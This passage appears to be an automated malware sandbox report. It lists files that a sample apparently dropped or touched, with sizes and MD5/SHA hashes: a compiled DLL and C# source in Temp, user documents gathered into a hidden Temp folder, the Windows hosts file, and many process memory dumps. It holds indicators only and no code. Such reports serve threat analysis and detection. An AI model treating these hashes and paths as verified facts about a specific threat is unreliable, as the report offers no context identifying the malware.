60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\etpgvxzy\etpgvxzy.dll

Filesize
4KB

MD5
25a87177aca80b2c1ddfce7649da2924

SHA1
8b5ca7698a849ffe8798a2e0305a87605c2388f0

SHA256
df9a77ff080d11f1f8f63870871e17794ca590cd1e19d6ff62f37308931da5d6

SHA512
5989d779584e476ab8a243efb6e66bbb085a095658235f6008e49bc373dffb9957cfe81a86ef550dffdcb8428a9df703fb8a03db749470b5cdc5ac9a5b3b579d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\ApproveBackup.3gpp

Filesize
942KB

MD5
37a9ef5a1351be9e52908818b6706c98

SHA1
646438cffab0b7eb957482c9ac69c71aa16bc355

SHA256
7e47caa4fa65e847b03240cce7ee04c5e53710fd820411d29ed9f7af6a25af09

SHA512
bdfa9823601b554d9e9492427d0c2d45582a1ff8f0d03d06cff36ff4daf080a0a2f35eb1d6be12c8b7109606ed66458eb941b991706384fbe14f2ec4daeebaa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\EnterTest.docx

Filesize
12KB

MD5
a25ed0506c7f5837eff8e2212088148c

SHA1
338715b25462e99befdea5d976b71f1097056b96

SHA256
f7fe1dd0170bc423b5b62331c35317c197dbf657c79cb0811603070feba8ded6

SHA512
9fcf49f3aac22707dfc4a19d0d35e2538da7b285983c75a4381550d83f0cc4559fb2c3bef2ae1b5511c128410652fe313560ec66a4e84f5f423ebc0b3f78d05c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\ResolveClose.docx

Filesize
16KB

MD5
d366119c6124002b28ac26da5562595a

SHA1
d8c801f33112ee082f3a5cf46baa4336ee57e120

SHA256
9b8b347709fb50f16d8422ec19b7134ca568246c375430765bf58ce05a20872f

SHA512
19b0873d422064b3d29a7abc8848a2899ffcf283aa1415f96fbdde6bac06e46a827380649925484bd72e86f93dfe9efac6958b4d470df33b7835713829f125fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\SelectExport.jpeg

Filesize
778KB

MD5
4da1906fc9a5a58c3a7e4834895bd817

SHA1
36650f57a9b57e02e84e5d42230a899ce1afb724

SHA256
dea2127e0890c0f4752c02058ba3418d3e62d47684e96ae576f1a6793c458c50

SHA512
47d58621a7b372c5bfc0bf390052ac2b6a424341109c89355a993d095c3b0a2b1d729ba6cd2fc26602157663832a15bc05b6e8e183da6e1fa9314c1a8e2ab30c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\ShowExit.jpg

Filesize
696KB

MD5
e1be965892d623cea9afabdd76828e19

SHA1
3f59f842c31aa011506be9670355d37cb7add64d

SHA256
5ab78d269e0e885304f8bc1d6e621eb8edd1a7c51c5cd80333ae8374eec18a95

SHA512
0cfb230b05e0b245deccca6f66ab8568c5db7e5b371e806422c50e68752f3158974588a4c34ae446b4e6c2dc4bf40d4ffbb8346fcb08a0ccad5d836dfaf347fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\GroupResolve.docx

Filesize
566KB

MD5
c23bc1992fc4b38a3fe1dfded9c021a9

SHA1
bc49b0dfdf577dc9d90ceaab77a8ab6f277b6888

SHA256
3c3cc63241ad94aeaef60a509ec1418a474f2281a36438478ecf6b863c35b10b

SHA512
08a8731d97bc141bb457b6ddd36af6f9100c5e023b65fe1680de5758fffc9dd74d4ec17b1a0f25552d5140edd4320be163c712bc35411ecf9adf14f6c10adff7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\RepairApprove.docx

Filesize
19KB

MD5
034066098cf2f248ad4b1c7754148baa

SHA1
2522fa7c3a8fd89ce318784ee31eee69edb963f0

SHA256
5a5d3576f8dc0c57eab5eb29034b78af94cc979f6934d8436286423dcca40e41

SHA512
1afdadfe4fbb49f47c4f39c68d8688344b26d27299264b50340c9e0525e544cbac5c14a185e2c4c1640fd0047ce6379d06b8d1592d3550a8138da46987bda1d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\ResumeRedo.xls

Filesize
717KB

MD5
be8f0228096b7fd0184b1fddba91c660

SHA1
41842362c44a883681f9f2519283466ab76f297e

SHA256
4dd1a527b56adc50f64b1aa7d99e87310afb238c28f264a29631becef96654aa

SHA512
45f87af32dbc0b8ee52c25ea7e99e9e346c3d9f8eddbbe192478ad13d0dcc0fc0c9d885b04aaf84a4ffc00fab7a073d3c22030cb06e29080b7a1394e2a2a4ed1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\ResumeUninstall.docx

Filesize
16KB

MD5
58d0a45941a5f7a6e22568e18d11e9ca

SHA1
b4d4f84c2e44f4220904e35c05a1a09188da2dc9

SHA256
f2cb8d9464a1cebe02afa9a393eae8a13e571990ee7efd292f81b6e1b128a61a

SHA512
d036d35eed7a20ce8913cca40ab748a54679f8f3d78f677cc9ca45311add24ae438cf6e4fd2c7fe19c5a3b524f4e94a8d424911a9a8a5ecdbcf6ffc2c5cf927f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\RevokeRestart.docx

Filesize
18KB

MD5
dbf6e9eb0f913c636b4e291ad1442cce

SHA1
60a92fc4b868b4908ca9892cb3fe314e87c46f35

SHA256
2e0493ac7f8c06b5513f244cc92eb2142a182e734a735f29c7ebfc73b0417fcf

SHA512
cb723512eb4cccfbb34f7f27cb54af4736888189dec5a8cb4763d559b7708c1e3254b9d1fd36b8917b53649202f5b0ef3a7a937f6574779ae18e38d2cc72a6fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\UnprotectPush.pdf

Filesize
767KB

MD5
abafa90bc55477509672ced10e34b69a

SHA1
ec245b9ca7b9c02d0e199d46c41b53f2d0243aff

SHA256
9159134f5ce0da7ca0aac2df93f3b0333feeedb41647458b164a22bd350af2fd

SHA512
acaad3910aa3ac703ffa14c931418b26804a09d25ecc7161a01031e09748b60d02d7718c04515d6ed5fd57a3ceded2c0bb1f2116b44378ce9e9c483d9993463b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\WatchRestore.pdf

Filesize
390KB

MD5
355a9c7ed19a59448a114edd43ce087b

SHA1
c2b26782376eda44cbb74d287ec9b3eee12edb7d

SHA256
3795bdf651df320593664eba545c5e55301d991f43e573726ef5f3cfeae7b294

SHA512
be1b17efb926c3b65e792d467435fc6069d2dff7c2df56d90e7b2de09a8ee70a51cf223b8d4a032eb0a3c8cd2eee23c3f632777f50aba859a3f3690b754d5ad1

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\etpgvxzy\CSC299C00AA8BDE4A45B6E8B0872426A2F.TMP

Filesize
652B

MD5
23cd988dc2e58181104e2d102aab9ee1

SHA1
397dba5b3a8c661135b4d1b647da5a5bfaf42828

SHA256
76119b950000dc75cb4b258af47877cb66cc765bca81cb4a20bde099ff57640d

SHA512
487d578fab270ddf6491121910a276ffb37aa84a68a3066b7160b12c66c7b0597debd2462c59fb02d83a3ade9e9da82f76af7cf2aad7c7798f8f0187a6a694d1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\etpgvxzy\etpgvxzy.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\etpgvxzy\etpgvxzy.cmdline

Filesize
607B

MD5
17c2e63dae11b9478cee4b74b2709979

SHA1
05e71289a16221523ceb98ddb6bb1e11eb25d08d

SHA256
16be78bda3a959ff05e21792f786db20b49c628269d2e6d37965a55254574a11

SHA512
25fd30a32edd3f15802c631b26cde806266336772db01a4562ef0e8d0b29f66a22aaa6a4f842ca494fb12a4c562adbdc7c5eb337c3c6f61ea01d8fcb4fbe1c06

Download Submit
memory/404-199-0x0000028228000000-0x0000028228008000-memory.dmp

Filesize
32KB

Download
memory/720-269-0x00000192E2640000-0x00000192E285C000-memory.dmp

Filesize
2.1MB

Download
memory/1208-136-0x0000021DF6650000-0x0000021DF6672000-memory.dmp

Filesize
136KB

Download
memory/1656-54-0x00007FF911800000-0x00007FF91182D000-memory.dmp

Filesize
180KB

Download
memory/1656-25-0x00007FF901770000-0x00007FF901D5A000-memory.dmp

Filesize
5.9MB

Download
memory/1656-83-0x00007FF9167D0000-0x00007FF9167E9000-memory.dmp

Filesize
100KB

Download
memory/1656-79-0x00007FF9153B0000-0x00007FF9153BD000-memory.dmp

Filesize
52KB

Download
memory/1656-78-0x00007FF911800000-0x00007FF91182D000-memory.dmp

Filesize
180KB

Download
memory/1656-76-0x00007FF910B00000-0x00007FF910B14000-memory.dmp

Filesize
80KB

Download
memory/1656-71-0x00007FF90B890000-0x00007FF90B948000-memory.dmp

Filesize
736KB

Download
memory/1656-208-0x00007FF9166C0000-0x00007FF9166D9000-memory.dmp

Filesize
100KB

Download
memory/1656-72-0x00000253368B0000-0x0000025336C25000-memory.dmp

Filesize
3.5MB

Download
memory/1656-73-0x00007FF901240000-0x00007FF9015B5000-memory.dmp

Filesize
3.5MB

Download
memory/1656-129-0x00007FF911100000-0x00007FF911123000-memory.dmp

Filesize
140KB

Download
memory/1656-74-0x00007FF915440000-0x00007FF915463000-memory.dmp

Filesize
140KB

Download
memory/1656-273-0x00007FF911070000-0x00007FF91109E000-memory.dmp

Filesize
184KB

Download
memory/1656-70-0x00007FF901770000-0x00007FF901D5A000-memory.dmp

Filesize
5.9MB

Download
memory/1656-66-0x00007FF911070000-0x00007FF91109E000-memory.dmp

Filesize
184KB

Download
memory/1656-64-0x00007FF9153C0000-0x00007FF9153CD000-memory.dmp

Filesize
52KB

Download
memory/1656-62-0x00007FF9166C0000-0x00007FF9166D9000-memory.dmp

Filesize
100KB

Download
memory/1656-60-0x00007FF901E70000-0x00007FF901FDF000-memory.dmp

Filesize
1.4MB

Download
memory/1656-58-0x00007FF911100000-0x00007FF911123000-memory.dmp

Filesize
140KB

Download
memory/1656-56-0x00007FF9167D0000-0x00007FF9167E9000-memory.dmp

Filesize
100KB

Download
memory/1656-176-0x00007FF901E70000-0x00007FF901FDF000-memory.dmp

Filesize
1.4MB

Download
memory/1656-46-0x00007FF91A920000-0x00007FF91A92F000-memory.dmp

Filesize
60KB

Download
memory/1656-30-0x00007FF915440000-0x00007FF915463000-memory.dmp

Filesize
140KB

Download
memory/1656-84-0x00007FF900DF0000-0x00007FF900F0C000-memory.dmp

Filesize
1.1MB

Download
memory/1656-285-0x00007FF90B890000-0x00007FF90B948000-memory.dmp

Filesize
736KB

Download
memory/1656-286-0x00000253368B0000-0x0000025336C25000-memory.dmp

Filesize
3.5MB

Download
memory/1656-288-0x00007FF901240000-0x00007FF9015B5000-memory.dmp

Filesize
3.5MB

Download
memory/1656-337-0x00007FF910B00000-0x00007FF910B14000-memory.dmp

Filesize
80KB

Download
memory/1656-300-0x00007FF901770000-0x00007FF901D5A000-memory.dmp

Filesize
5.9MB

Download
memory/1656-306-0x00007FF901E70000-0x00007FF901FDF000-memory.dmp

Filesize
1.4MB

Download
memory/1656-301-0x00007FF915440000-0x00007FF915463000-memory.dmp

Filesize
140KB

Download
memory/1656-325-0x00007FF901770000-0x00007FF901D5A000-memory.dmp

Filesize
5.9MB

Download
memory/1656-350-0x00007FF90B890000-0x00007FF90B948000-memory.dmp

Filesize
736KB

Download
memory/1656-349-0x00007FF911070000-0x00007FF91109E000-memory.dmp

Filesize
184KB

Download
memory/1656-351-0x00000253368B0000-0x0000025336C25000-memory.dmp

Filesize
3.5MB

Download
memory/1656-348-0x00007FF9153C0000-0x00007FF9153CD000-memory.dmp

Filesize
52KB

Download
memory/1656-347-0x00007FF9166C0000-0x00007FF9166D9000-memory.dmp

Filesize
100KB

Download
memory/1656-346-0x00007FF901E70000-0x00007FF901FDF000-memory.dmp

Filesize
1.4MB

Download
memory/1656-345-0x00007FF911100000-0x00007FF911123000-memory.dmp

Filesize
140KB

Download
memory/1656-344-0x00007FF9167D0000-0x00007FF9167E9000-memory.dmp

Filesize
100KB

Download
memory/1656-343-0x00007FF911800000-0x00007FF91182D000-memory.dmp

Filesize
180KB

Download
memory/1656-342-0x00007FF91A920000-0x00007FF91A92F000-memory.dmp

Filesize
60KB

Download
memory/1656-341-0x00007FF915440000-0x00007FF915463000-memory.dmp

Filesize
140KB

Download
memory/1656-340-0x00007FF901240000-0x00007FF9015B5000-memory.dmp

Filesize
3.5MB

Download
memory/1656-339-0x00007FF900DF0000-0x00007FF900F0C000-memory.dmp

Filesize
1.1MB

Download
memory/1656-338-0x00007FF9153B0000-0x00007FF9153BD000-memory.dmp

Filesize
52KB

Download
memory/4368-299-0x0000017EA9930000-0x0000017EA9B4C000-memory.dmp

Filesize
2.1MB

Download